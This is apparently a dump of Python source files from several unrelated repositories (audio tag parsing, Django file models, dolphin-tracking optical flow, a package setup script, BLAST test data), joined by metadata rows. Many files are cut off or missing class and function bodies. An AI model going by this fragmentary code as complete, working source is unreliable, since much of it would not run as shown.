from bucketlist.tests.factories import (BucketlistFactory,
UserFactory,
ItemFactory)
# Create your tests here.
| 41.593407 | 88 | 0.574813 |
b0fdbad819a58bb24f68fffc89eae7b13da8ac0a | 514 | py | Python | src/model/match.py | HarborYuan/Student-Information-Management-System | 7226bdea9a422cc88876ba58f1e36e4f7087342d | [
"Apache-2.0"
] | null | null | null | src/model/match.py | HarborYuan/Student-Information-Management-System | 7226bdea9a422cc88876ba58f1e36e4f7087342d | [
"Apache-2.0"
] | null | null | null | src/model/match.py | HarborYuan/Student-Information-Management-System | 7226bdea9a422cc88876ba58f1e36e4f7087342d | [
"Apache-2.0"
] | 1 | 2018-12-03T11:43:37.000Z | 2018-12-03T11:43:37.000Z | import re
| 19.769231 | 77 | 0.486381 |
b0feb9c47583568b91cc55ff1a17eb9a915a0f41 | 1,626 | py | Python | framework/repository/info.py | jarret/bitcoin_helpers | 4b6155ea3b004ad58a717b36cd58138d058281b1 | [
"MIT"
] | null | null | null | framework/repository/info.py | jarret/bitcoin_helpers | 4b6155ea3b004ad58a717b36cd58138d058281b1 | [
"MIT"
] | null | null | null | framework/repository/info.py | jarret/bitcoin_helpers | 4b6155ea3b004ad58a717b36cd58138d058281b1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import json
import os
import sys
from framework.path.path import Path
from framework.file.io import read_file
from framework.git.path import GitPath
REPO_INFO_FILENAME = ".bitcoin-maintainer-tools.json"
FAILBACK_REPO_INFO_FILENAME = ".fallback-bitcoin-maintainer-tools.json"
| 36.954545 | 79 | 0.674662 |
b0ff358c2ba4c5c042b20c8c472910cebd571e0f | 861 | py | Python | backend/members/schema.py | singsaker/intern | 9376732c6d537f46443ad43afa51e82df2005da8 | [
"MIT"
] | 4 | 2021-10-06T19:09:12.000Z | 2022-03-28T12:14:42.000Z | backend/members/schema.py | singsaker/intern | 9376732c6d537f46443ad43afa51e82df2005da8 | [
"MIT"
] | 2 | 2021-11-30T16:07:05.000Z | 2022-02-17T23:57:00.000Z | backend/members/schema.py | singsaker/intern | 9376732c6d537f46443ad43afa51e82df2005da8 | [
"MIT"
] | null | null | null | import graphene
import graphql_jwt
from .resolvers import MemberResolvers
from .types import MemberType, UserType
| 34.44 | 70 | 0.773519 |
b0ffaa7976be25e795d5abe04edf6fd2fd0631eb | 1,540 | py | Python | cookie_manager/security_decorator.py | ScholarPack/cookie-manager | 342eaf19d4ebbe83319306e4a3afcc3988f61d3d | [
"MIT"
] | 10 | 2020-02-26T14:13:05.000Z | 2021-07-30T02:16:47.000Z | cookie_manager/security_decorator.py | ScholarPack/cookie-manager | 342eaf19d4ebbe83319306e4a3afcc3988f61d3d | [
"MIT"
] | 13 | 2020-02-26T10:42:09.000Z | 2021-09-30T13:26:23.000Z | cookie_manager/security_decorator.py | ScholarPack/cookie-manager | 342eaf19d4ebbe83319306e4a3afcc3988f61d3d | [
"MIT"
] | 3 | 2020-03-29T00:49:23.000Z | 2020-07-24T16:26:20.000Z | from functools import wraps
from typing import List, Any
from cookie_manager import CookieManager
| 34.222222 | 96 | 0.619481 |
7c0015d18f7709ad1f58810e4e4fbcf0c3ae1358 | 6,394 | py | Python | mutagen/aiff.py | lucienimmink/scanner.py | cecaa0a570ba8058321dea1c8efa9f77868effb3 | [
"MIT"
] | 2 | 2022-03-14T15:34:14.000Z | 2022-03-23T17:05:42.000Z | mutagen/aiff.py | lucienimmink/scanner.py | cecaa0a570ba8058321dea1c8efa9f77868effb3 | [
"MIT"
] | null | null | null | mutagen/aiff.py | lucienimmink/scanner.py | cecaa0a570ba8058321dea1c8efa9f77868effb3 | [
"MIT"
] | 2 | 2020-09-17T08:27:12.000Z | 2021-08-23T11:13:52.000Z | # -*- coding: utf-8 -*-
# Copyright (C) 2014 Evan Purkhiser
# 2014 Ben Ockmore
# 2019-2020 Philipp Wolfer
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
"""AIFF audio stream information and tags."""
import struct
from struct import pack
from mutagen import StreamInfo, FileType
from mutagen.id3._util import ID3NoHeaderError, error as ID3Error
from mutagen._iff import (
IffChunk,
IffContainerChunkMixin,
IffFile,
IffID3,
InvalidChunk,
error as IffError,
)
from mutagen._util import (
convert_error,
loadfile,
endswith,
)
__all__ = ["AIFF", "Open", "delete"]
# based on stdlib's aifc
_HUGE_VAL = 1.79769313486231e+308
def read_float(data):
"""Raises OverflowError"""
assert len(data) == 10
expon, himant, lomant = struct.unpack('>hLL', data)
sign = 1
if expon < 0:
sign = -1
expon = expon + 0x8000
if expon == himant == lomant == 0:
f = 0.0
elif expon == 0x7FFF:
raise OverflowError("inf and nan not supported")
else:
expon = expon - 16383
# this can raise OverflowError too
f = (himant * 0x100000000 + lomant) * pow(2.0, expon - 63)
return sign * f
class AIFFFormChunk(AIFFChunk, IffContainerChunkMixin):
"""The AIFF root chunk."""
class AIFFFile(IffFile):
"""Representation of a AIFF file"""
class AIFFInfo(StreamInfo):
"""AIFFInfo()
AIFF audio stream information.
Information is parsed from the COMM chunk of the AIFF file
Attributes:
length (`float`): audio length, in seconds
bitrate (`int`): audio bitrate, in bits per second
channels (`int`): The number of audio channels
sample_rate (`int`): audio sample rate, in Hz
bits_per_sample (`int`): The audio sample size
"""
length = 0
bitrate = 0
channels = 0
sample_rate = 0
class _IFFID3(IffID3):
"""A AIFF file with ID3v2 tags"""
Open = AIFF
| 25.99187 | 78 | 0.610416 |
7c007a5d23b8a2015cedebc0918ddd73086265d1 | 398 | py | Python | secrets_example.py | fuzzysearch404/SpotifyPlaylistScripts | 17915742ca666edd8376f04d0e2687b207c32471 | [
"MIT"
] | null | null | null | secrets_example.py | fuzzysearch404/SpotifyPlaylistScripts | 17915742ca666edd8376f04d0e2687b207c32471 | [
"MIT"
] | 1 | 2021-11-03T13:40:55.000Z | 2021-11-03T13:40:55.000Z | secrets_example.py | fuzzysearch404/SpotifyPlaylistScripts | 17915742ca666edd8376f04d0e2687b207c32471 | [
"MIT"
] | null | null | null | # Spotify web application client ID
CLIENT_ID = 'your_client_id'
# Spotify web application client secret
CLIENT_SECRET = 'your_client_secret'
# Redirect URI. This can be any uri.
# Howerver, you MUST add this uri to your Spotify web app's settings.
# Application settings -> Edit Settings -> Redirect URIs.
# Add it there and save the settings.
REDIRECT_URI = 'https://localhost:2020/done' | 44.222222 | 70 | 0.753769 |
7c02196ff08fda517c472d6a6325f606f3df8cac | 1,210 | py | Python | tradeiobot/db/stores/abstractstore.py | hcv57/tradeio-bot | a4c9f96a104e20ca0618d8d787cfef3599c8ebb7 | [
"MIT"
] | 2 | 2018-10-28T18:47:02.000Z | 2019-10-09T14:52:04.000Z | tradeiobot/db/stores/abstractstore.py | hcv57/tradeio-bot | a4c9f96a104e20ca0618d8d787cfef3599c8ebb7 | [
"MIT"
] | null | null | null | tradeiobot/db/stores/abstractstore.py | hcv57/tradeio-bot | a4c9f96a104e20ca0618d8d787cfef3599c8ebb7 | [
"MIT"
] | null | null | null | import abc
| 26.888889 | 56 | 0.602479 |
7c037d89e3a9bf24f7302ca98b6d3dd08cac776e | 11,062 | py | Python | ML/meanvel.py | lewisfish/Triton-dolphin | bc7256485e1bd943e0b9b3017c214c82e26905f3 | [
"MIT"
] | null | null | null | ML/meanvel.py | lewisfish/Triton-dolphin | bc7256485e1bd943e0b9b3017c214c82e26905f3 | [
"MIT"
] | null | null | null | ML/meanvel.py | lewisfish/Triton-dolphin | bc7256485e1bd943e0b9b3017c214c82e26905f3 | [
"MIT"
] | null | null | null | from concurrent import futures
from itertools import repeat
import pathlib
from pathlib import Path
import pickle
import time
from typing import List, Tuple, Union
import cv2 as cv2
import hdbscan
import numpy as np
import pims
from sklearn.cluster import KMeans
from sklearn.preprocessing import StandardScaler
from tqdm import tqdm
from gps import getAltitude
from ocr import getMagnification
def _getFullFileName(files: List[pathlib.PosixPath], target: str) -> pathlib.PosixPath:
'''Match a file to list of full filenames
Parameters
----------
files : List[pathlib.PosixPath]
List of file name to match to
target : str
File to be matched with full path
Returns
-------
file : pathlib.PosixPath
Full filename
'''
for file in files:
if target in str(file):
return file
def getFrames(file: str, position: int, offset: int) -> Tuple[List[pims.frame.Frame], List[int], float]:
"""Get 3 frames for optical flow analysis. Frames are serperated by +/- offset.
Central frame is at position.
Parameters
----------
file : str
Video file to get frames from
position : int
Position of central frame
offset : int
offset to get other frames for optical flow analysis
Returns
-------
Tuple[List[pims.frame.Frame], List[int], float]
Frames at position, +/- offset, list of frame positions, fps of video
"""
assert position > offset
video = pims.PyAVVideoReader(file)
frame0 = video[position - offset]
frame1 = video[position]
frame2 = video[position + offset]
return [frame0, frame1, frame2], [position - offset, position, position + offset], float(video._frame_rate)
def getFramesCV2(file: str, position: int, offset: int):
"""Get 3 frames for optical flow analysis using cv2. Frames are serperated by +/- offset.
Central frame is at position.
Parameters
----------
file : str
Video file to get frames from
position : int
Position of central frame
offset : int
offset to get other frames for optical flow analysis
Returns
-------
Tuple[List[np.ndarray], List[int], float]
Frames at position, +/- offset, list of frame positions, fps of video
"""
assert position >= offset
cap = cv2.VideoCapture(str(file))
fps = cap.get(cv2.CAP_PROP_FPS)
cap.set(cv2.CAP_PROP_POS_FRAMES, position-offset)
_, frame = cap.read()
frame0 = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
cap.set(cv2.CAP_PROP_POS_FRAMES, position)
_, frame = cap.read()
frame1 = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
cap.set(cv2.CAP_PROP_POS_FRAMES, position+offset)
_, frame = cap.read()
frame2 = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
return [frame0, frame1, frame2], [position - offset, position, position + offset], fps
def cropFrames(frames: List[pims.frame.Frame], box: List[int]) -> List[pims.frame.Frame]:
"""Crop frames.
Parameters
----------
frames : List[pims.frame.Frame]
List of frames to be cropped
box : List[int]
Dimensions, and location to crop: format [y0, x0, y1, x1]
Returns
-------
List[pims.frame.Frame]
List of cropped frames
"""
croppedFrames = []
xi = box[1]
xii = box[3]
yi = box[0]
yii = box[2]
for frame in frames:
croppedFrames.append(frame[yi:yii, xi:xii])
return croppedFrames
def preprocessFrame(frame: pims.frame.Frame, fg) -> Tuple[np.ndarray]:
"""Preprocess frame. Converts to grayscale and removes noise.
Parameters
----------
frame : pims.frame.Frame
Frame to be preprocessed
fg : TYPE
Foreground remover?
Returns
-------
Tuple[np.ndarray]
Dilated image binary image, and grayscale image
"""
gray = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
fgmask = fg.apply(gray)
blur = cv2.GaussianBlur(fgmask, (5, 5), 0)
_, thesh = cv2.threshold(blur, 20, 255, cv2.THRESH_BINARY)
dilated = cv2.dilate(thesh, None, iterations=3)
return dilated, gray
def processContours(contours: List[float], contourpoints: List[List[float]], frame: pims.frame.Frame, debug=False) -> Tuple[List[List[float]], pims.frame.Frame]:
"""Get bounding boxes for each contour.
Parameters
----------
contours : List[float]
List of contours to find bounding boxes for.
contourpoints : List[List[float]]
List of bounding boxes. Does this need passed in?
frame : pims.frame.Frame
Frame from which the contours are from
debug : bool, optional
If true then draw bounding boxes
Returns
-------
Tuple[List[List[float]], pims.frame.Frame]
List of bounding boxes, and frame
"""
for cnt in contours:
x, y, w, h = cv2.boundingRect(cnt)
cx = x + (w / 2)
cy = y + (h / 2)
contourpoints.append([cx, cy])
if debug:
cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
return contourpoints, frame
def processFile(file: str) -> List[Union[str, int, List[float], int]]:
"""Open, read and process data from file.
Parameters
----------
file : str
File to read.
Returns
-------
List[Union[str, int, List[float], int]]
List of videoname, framenumber, bounding box, and label
"""
info = []
f = open(file, "r")
lines = f.readlines()[1:]
for line in lines:
name, framenum, *box, label, vel, kmeans, hdbscan = line.split(",")
framenum = int(framenum)
label = int(label)
box = [int(x) for x in box]
item = [name, framenum, box, label]
info.append(item)
return info
def trainParallel(workers=8):
"""Wrapper function for training HDBSCAN in parallel.
Parameters
----------
workers : int, optional
Number of workers to use in parallel, default=2
"""
data = processFile("../data/train.csv")
with futures.ProcessPoolExecutor(workers) as executor:
res = list(tqdm(executor.map(train, data), total=len(data)))
velocities = []
for i in res:
velocities.extend(i)
# with open('velocities.npy', 'wb') as f:
# np.save(f, velocities)
# model = hdbscan.HDBSCAN(min_cluster_size=1000, cluster_selection_epsilon=0.2, min_samples=5, leaf_size=100, prediction_data=True).fit(np.array(velocities).reshape(-1, 1))
# import pickle
# with open('model.pickle', 'wb') as f:
# pickle.dump(model, f)
def train(info: Tuple[str, List[float], int], root="/data/lm959/data/", crop=False):
"""Training function for HDBSCAN. Actually does the optical flow and
returns the data needed for training.
Parameters
----------
info : Tuple[str, List[float], int]
Tuple of video filename, framenumber, bounding box of object, and label of object.
root : str, optional
Root of file system location where videos are stored.
crop : bool, optional
If true then crop frames to bounding box of object.
Returns
-------
velocitymeterPerSecond : np.ndarray
List of velocities in m/s
"""
lk_params = dict(winSize=(15, 15),
maxLevel=2,
criteria=(cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))
fgbg = cv2.createBackgroundSubtractorMOG2()
root = Path(root)
videoFiles = list(root.glob("**/*.mp4"))
vidname, fnumber, box, label = info
fullname = _getFullFileName(videoFiles, vidname)
frames, framenums, fps = getFramesCV2(fullname, fnumber, offset=15)
contourpoints = []
fpsPerFrame = 1. / fps
alt = getAltitude(fullname, framenums[1], gpsdataPath="../data/gps/")
magn = getMagnification(frames[1])
dolphLength = 1714 * (magn / alt) + 16.5
dolphPixelPerSecond = dolphLength / 2.
if crop:
frames = cropFrames(frames, box)
frame = frames[0]
for i in range(0, 2):
dilated, gray1 = preprocessFrame(frame, fgbg)
contours, _ = cv2.findContours(dilated, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
contourpoints, frame = processContours(contours, contourpoints, frame)
p0 = np.array(contourpoints, np.float32)
gray2 = cv2.cvtColor(frames[i + 1], cv2.COLOR_RGB2GRAY)
try:
p1, _, _ = cv2.calcOpticalFlowPyrLK(gray1, gray2, p0, None, **lk_params)
diff = np.array(p1) - np.array(p0)
velocity = diff / fpsPerFrame
velocity = [np.sqrt(item[0]**2 + item[1]**2) for item in velocity]
frame = frames[1].copy()
contourpoints = []
except:
# velocity = np.array([0.])
# if not crop:
continue
velocitymeterPerSecond = velocity / dolphPixelPerSecond
return velocitymeterPerSecond
def calcLabels():
"""Summary
"""
from sklearn.cluster import KMeans
data = processFile("../data/train.csv")
data = data
workers = 8
with futures.ProcessPoolExecutor(workers) as executor:
res = list(tqdm(executor.map(train, data, repeat("/data/lm959/data/"), repeat(True)), total=len(data)))
with open('velocities.npy', "rb") as f:
arrays = np.load(f)
# model = hdbscan.HDBSCAN(min_cluster_size=1000, min_samples=5, leaf_size=100, prediction_data=True).fit(arrays.reshape(-1, 1))
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
TotalVelocity = scaler.fit_transform(arrays.reshape(-1, 1))
model = KMeans(n_clusters=6, random_state=0, max_iter=300, precompute_distances=True, algorithm='full').fit(np.array(TotalVelocity).reshape(-1, 1))
outshizz = []
for i, item in enumerate(res):
vels = np.mean(item)
test_labels = model.predict(vels.reshape(-1, 1))
tmp = [data[i][0], data[i][1], data[i][2][0], data[i][2][1], data[i][2][2], data[i][2][3], data[i][3], vels, test_labels[0]]
outshizz.append(tmp)
with open('train-data-kmeans.npy', 'wb') as f:
np.save(f, np.array(outshizz))
# def infer(vels, tmper):
# import pickle
# with open('model.pickle', "rb") as f:
# loaded_obj = pickle.load(f)
# test_labels, strengths = hdbscan.approximate_predict(loaded_obj, np.array(vels).reshape(-1, 1))
# results = trainParallel(workers=6)
# calcLabels()
# elbowPlot()
| 28.29156 | 176 | 0.626831 |
7c088d45f5f62ebef1ceafec95293618d4108e74 | 390 | py | Python | os_scrapy_record/spiders/__init__.py | zanachka/os-scrapy-record | 03d0cafbea74c981a72d5d7c8a3e28f05e487689 | [
"MIT"
] | 2 | 2020-05-13T12:55:01.000Z | 2020-07-24T06:52:49.000Z | os_scrapy_record/spiders/__init__.py | zanachka/os-scrapy-record | 03d0cafbea74c981a72d5d7c8a3e28f05e487689 | [
"MIT"
] | 1 | 2020-05-22T09:03:04.000Z | 2020-05-22T09:31:45.000Z | os_scrapy_record/spiders/__init__.py | zanachka/os-scrapy-record | 03d0cafbea74c981a72d5d7c8a3e28f05e487689 | [
"MIT"
] | 2 | 2020-07-21T00:54:09.000Z | 2020-10-29T18:10:03.000Z | # This package will contain the spiders of your Scrapy project
#
# Please refer to the documentation for information on how to create and manage
# your spiders.
import scrapy
| 19.5 | 79 | 0.697436 |
7c094dc9f6789987096d646f2920ee372eb6f1b8 | 3,409 | py | Python | zero_paper/models.py | PLsergent/zero-paper | 4663e0e9976447419b5da5cdd32e57dccfc32125 | [
"MIT"
] | null | null | null | zero_paper/models.py | PLsergent/zero-paper | 4663e0e9976447419b5da5cdd32e57dccfc32125 | [
"MIT"
] | null | null | null | zero_paper/models.py | PLsergent/zero-paper | 4663e0e9976447419b5da5cdd32e57dccfc32125 | [
"MIT"
] | null | null | null | from django.db import models
from django.contrib.auth.models import User
from django.utils import timezone
from django.dispatch import receiver
import os
import shutil
def upload_to(instance, filename):
upload_to = ""
if instance.folder:
upload_to = instance.folder.name + "/"
instance = instance.folder
while True:
if not instance.parent_folder:
break
upload_to = instance.parent_folder.name + "/" + upload_to
instance = instance.parent_folder
return "files/" + upload_to + filename
| 29.903509 | 94 | 0.661484 |
7c0d4593b55079c9f02350a49f16e7cc7ca276e1 | 2,435 | py | Python | acd-annotator-python/acd_annotator_python/acd_annotator.py | Alvearie/acd-extension-framework | 04779a66dec3be9cd0f1899037eaba9c505d3edd | [
"Apache-2.0"
] | 2 | 2021-04-20T17:30:37.000Z | 2021-11-28T01:03:27.000Z | acd-annotator-python/acd_annotator_python/acd_annotator.py | Alvearie/acd-extension-framework | 04779a66dec3be9cd0f1899037eaba9c505d3edd | [
"Apache-2.0"
] | 2 | 2021-04-15T14:16:10.000Z | 2021-04-16T16:45:58.000Z | acd-annotator-python/acd_annotator_python/acd_annotator.py | Alvearie/acd-extension-framework | 04779a66dec3be9cd0f1899037eaba9c505d3edd | [
"Apache-2.0"
] | 4 | 2021-04-15T14:11:10.000Z | 2021-08-10T19:19:46.000Z | # ***************************************************************** #
# #
# (C) Copyright IBM Corp. 2021 #
# #
# SPDX-License-Identifier: Apache-2.0 #
# #
# ***************************************************************** #
from abc import ABC, abstractmethod
import inspect
from fastapi import Request
from acd_annotator_python.container_model.main import UnstructuredContainer
from acd_annotator_python.container_model.main import StructuredContainer
| 39.918033 | 120 | 0.561396 |
9fd0cbfeb51abe9f235403600ea433496b7820f2 | 14,396 | py | Python | objectModel/Python/tests/persistence/cdmfolder/data_partition/test_data_partition.py | Microsoft/CDM | 7ea59264d661356ca1b44c31a352753928d08b5f | [
"CC-BY-4.0",
"MIT"
] | 265 | 2018-03-04T04:47:50.000Z | 2019-05-06T13:31:18.000Z | objectModel/Python/tests/persistence/cdmfolder/data_partition/test_data_partition.py | Microsoft/CDM | 7ea59264d661356ca1b44c31a352753928d08b5f | [
"CC-BY-4.0",
"MIT"
] | 39 | 2018-03-21T16:57:12.000Z | 2019-05-06T17:30:23.000Z | objectModel/Python/tests/persistence/cdmfolder/data_partition/test_data_partition.py | Microsoft/CDM | 7ea59264d661356ca1b44c31a352753928d08b5f | [
"CC-BY-4.0",
"MIT"
] | 75 | 2018-03-09T20:33:13.000Z | 2019-05-05T06:55:43.000Z | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
import os
import unittest
from cdm.utilities.logging import logger
from cdm.enums import CdmObjectType, CdmStatusLevel, CdmIncrementalPartitionType
from cdm.objectmodel import CdmCorpusContext, CdmCorpusDefinition, CdmManifestDefinition, CdmEntityDefinition
from cdm.persistence.cdmfolder import ManifestPersistence
from cdm.persistence.cdmfolder.types import ManifestContent
from cdm.utilities import Constants
from tests.cdm.cdm_collection.cdm_collection_helper_functions import create_document_for_entity
from tests.common import async_test, TestHelper
| 56.454902 | 221 | 0.727077 |
9fd1f014c5d5b7866e50185659805f63bd40ebd9 | 6,038 | py | Python | setup.py | andreatramacere/jetset | 4b7859622db9713b6ee243e2c12ec81321b372bf | [
"BSD-3-Clause"
] | 16 | 2019-02-11T06:58:43.000Z | 2021-12-28T13:00:35.000Z | setup.py | andreatramacere/jetset | 4b7859622db9713b6ee243e2c12ec81321b372bf | [
"BSD-3-Clause"
] | 14 | 2019-04-14T14:49:55.000Z | 2021-12-27T04:18:24.000Z | setup.py | andreatramacere/jetset | 4b7859622db9713b6ee243e2c12ec81321b372bf | [
"BSD-3-Clause"
] | 10 | 2019-02-25T14:53:28.000Z | 2022-03-02T08:49:19.000Z | #!/usr/bin/env python
from __future__ import division, absolute_import, print_function
__author__ = 'andrea tramacere'
from setuptools import setup, find_packages,Extension
# from setuptools.command.install import install
# from distutils.extension import Extension
# import distutils.command.install as orig
from distutils.command.build import build
from setuptools.command.install import install
from distutils.sysconfig import get_python_lib
import os
import glob
import shutil
import fnmatch
import json
import sys
custom_cmdclass = {'build': CustomBuild,
'install': CustomInstall,
'clean':CustomClean}
with open('jetset/pkg_info.json') as fp:
_info = json.load(fp)
__version__ = _info['version']
f = open("./requirements.txt",'r')
req=f.readlines()
f.close()
req=[n.strip() for n in req if n.startswith('#') is False]
src_files=['jetset/jetkernel/jetkernel.i']
src_files.extend(glob.glob ('jetkernel_src/src/*.c'))
_module=Extension('jetset.jetkernel/_jetkernel',
sources=src_files,
#extra_compile_options='-fPIC -v -c -m64 -I',
#extra_link_options='-suppress',
swig_opts=['-v','-threads'],
include_dirs=['jetkernel_src/include'])
if os.getenv('JETSETBESSELBUILD') == 'TRUE':
_test_suite = 'jetset.tests.test_build_functions'
else:
_test_suite = None
with open("proj_descr.md", "r") as f:
long_description = f.read()
# this to skip that pip install packages when installing src from conda
is_conda = os.path.exists(os.path.join(sys.prefix, 'conda-meta'))
if is_conda:
install_req=None
else:
install_req=req
print('-> version', __version__, install_req)
setup(name='jetset',
version=__version__,
author='Andrea Tramacere',
url='https://github.com/andreatramacere/jetset',
long_description=long_description,
long_description_content_type='text/markdown',
description="A framework for self-consistent modeling and fitting of astrophysical relativistic jets SEDs",
author_email='andrea.tramacere@gmail.com',
packages=['jetset', 'jetset.leastsqbound', 'jetset.jetkernel','jetset.tests'],
package_data={'jetset':['Spectral_Templates_Repo/*.dat','test_data/SEDs_data/*ecsv','./requirements.txt','ebl_data/*','mathkernel/*dat'],'jetkernel':['mathkernel/*dat']},
include_package_data = True,
cmdclass=custom_cmdclass,
ext_modules = [_module],
install_requires=install_req,
py_modules=['jetset.jetkernel/jetkernel'],
python_requires='>=3.7',
test_suite =_test_suite,
zip_safe=True)
| 34.901734 | 176 | 0.48791 |
9fd494efb313bbd651da7b57c11d4c1658a52fc3 | 1,610 | py | Python | example/torch_classifier.py | KevinEloff/deep-chain-apps | 0952845e93f0c0592f04275fe99b122ff831901f | [
"Apache-1.1"
] | null | null | null | example/torch_classifier.py | KevinEloff/deep-chain-apps | 0952845e93f0c0592f04275fe99b122ff831901f | [
"Apache-1.1"
] | null | null | null | example/torch_classifier.py | KevinEloff/deep-chain-apps | 0952845e93f0c0592f04275fe99b122ff831901f | [
"Apache-1.1"
] | null | null | null | """
Module that provide a classifier template to train a model on embeddings.
With use the pathogen vs human dataset as an example. The embedding of 100k proteins come
from the protBert model.
The model is built with pytorch_ligthning, a wrapper on top of
pytorch (similar to keras with tensorflow)
Feel feel to build you own model if you want to build a more complex one
"""
from deepchain.dataset import load_pathogen_dataset
from deepchain.models import MLP
from deepchain.models.utils import (
confusion_matrix_plot,
dataloader_from_numpy,
model_evaluation_accuracy,
)
from sklearn.model_selection import train_test_split
# Load embedding and target dataset
X, y = load_pathogen_dataset()
X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.3)
train_dataloader = dataloader_from_numpy(X_train, y_train, batch_size=32)
test_dataloader = dataloader_from_numpy(X_val, y_val, batch_size=32)
# Build a multi-layer-perceptron on top of embedding
# The fit method can handle all the arguments available in the
# 'trainer' class of pytorch lightening :
# https://pytorch-lightning.readthedocs.io/en/latest/common/trainer.html
# Example arguments:
# * specifies all GPUs regardless of its availability :
# Trainer(gpus=-1, auto_select_gpus=False, max_epochs=20)
mlp = MLP(input_shape=X_train.shape[1])
mlp.fit(train_dataloader, epochs=5)
mlp.save_model("model.pt")
# Model evaluation
prediction, truth = model_evaluation_accuracy(test_dataloader, mlp)
# Plot confusion matrix
confusion_matrix_plot(truth, (prediction > 0.5).astype(int), ["0", "1"])
| 36.590909 | 90 | 0.775776 |
9fd54ac2fec1187dcd8824c5cc8a001bad343192 | 5,589 | py | Python | towavfile.py | streamsoftdev/audiomods | 0e3d27fcd9af0a0f6a9de512112425e093f82dda | [
"Apache-2.0"
] | null | null | null | towavfile.py | streamsoftdev/audiomods | 0e3d27fcd9af0a0f6a9de512112425e093f82dda | [
"Apache-2.0"
] | null | null | null | towavfile.py | streamsoftdev/audiomods | 0e3d27fcd9af0a0f6a9de512112425e093f82dda | [
"Apache-2.0"
] | null | null | null | #Copyright 2022 Nathan Harwood
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import numpy as np
from pathlib import Path
import struct
from audiomodule.audiomodule import AM_CONTINUE, AM_CYCLIC_UNDERRUN, AM_ERROR, AM_INPUT_REQUIRED, MODULE_ERROR, \
AudioModule, sw_dtype, audiomod, nice_channels, nice_frequency_str, hms2_str
| 33.668675 | 113 | 0.580247 |
9fd5c810c4ce10644e6de28ce2355f1bd5e61c6a | 6,857 | py | Python | test/blast/sample_data.py | UdoGi/dark-matter | 3d49e89fa5e81f83144119f6216c5774176d203b | [
"MIT"
] | 10 | 2016-03-09T09:43:14.000Z | 2021-04-03T21:46:12.000Z | test/blast/sample_data.py | terrycojones/dark-matter | 67d16f870db6b4239e17e542bc6e3f072dc29c75 | [
"MIT"
] | 332 | 2015-01-07T12:37:30.000Z | 2022-01-20T15:48:11.000Z | test/blast/sample_data.py | terrycojones/dark-matter | 67d16f870db6b4239e17e542bc6e3f072dc29c75 | [
"MIT"
] | 4 | 2016-03-08T14:56:39.000Z | 2021-01-27T08:11:27.000Z | # Sample BLAST parameters.
PARAMS = {
'application': 'BLASTN',
'blast_cutoff': [
None,
None
],
'database': 'manx-shearwater',
'database_length': 17465129,
'database_letters': None,
'database_name': [],
'database_sequences': 70016,
'date': '',
'dropoff_1st_pass': [
None,
None
],
'effective_database_length': None,
'effective_hsp_length': 22,
'effective_query_length': None,
'effective_search_space': 382194648.0,
'effective_search_space_used': None,
'frameshift': [
None,
None
],
'gap_penalties': [
5,
2
],
'gap_trigger': [
None,
None
],
'gap_x_dropoff': [
None,
None
],
'gap_x_dropoff_final': [
None,
None
],
'gapped': 0,
'hsps_gapped': None,
'hsps_no_gap': None,
'hsps_prelim_gapped': None,
'hsps_prelim_gapped_attemped': None,
'ka_params': [
0.625,
0.41,
0.78
],
'ka_params_gap': [
None,
None,
None
],
'matrix': '',
'num_good_extends': None,
'num_hits': None,
'num_letters_in_database': 17465129,
'num_seqs_better_e': None,
'num_sequences': None,
'num_sequences_in_database': 70016,
'posted_date': [],
'query': 'GZG3DGY01ASHXW',
'query_id': 'Query_1',
'query_length': 46,
'query_letters': 46,
'reference': 'Stephen F. Altschul, Thomas L. Madden, ...',
'sc_match': 2,
'sc_mismatch': -3,
'threshold': None,
'version': '2.2.28+',
'window_size': None
}
RECORD0 = {
'query': 'id0',
'alignments': [
{
'length': 37000,
'hsps': [
{
'bits': 20,
'sbjct_end': 15400,
'expect': 1e-11,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 15362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Squirrelpox virus 1296/99',
},
{
'length': 38000,
'hsps': [
{
'bits': 25,
'sbjct_end': 12400,
'expect': 1e-10,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 12362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Squirrelpox virus 55',
}
]
}
RECORD1 = {
'query': 'id1',
'alignments': [
{
'length': 35000,
'hsps': [
{
'bits': 20,
'sbjct_end': 11400,
'expect': 1e-8,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 11362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Monkeypox virus 456',
},
{
'length': 35000,
'hsps': [
{
'bits': 20,
'sbjct_end': 10400,
'expect': 1e-7,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 10362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
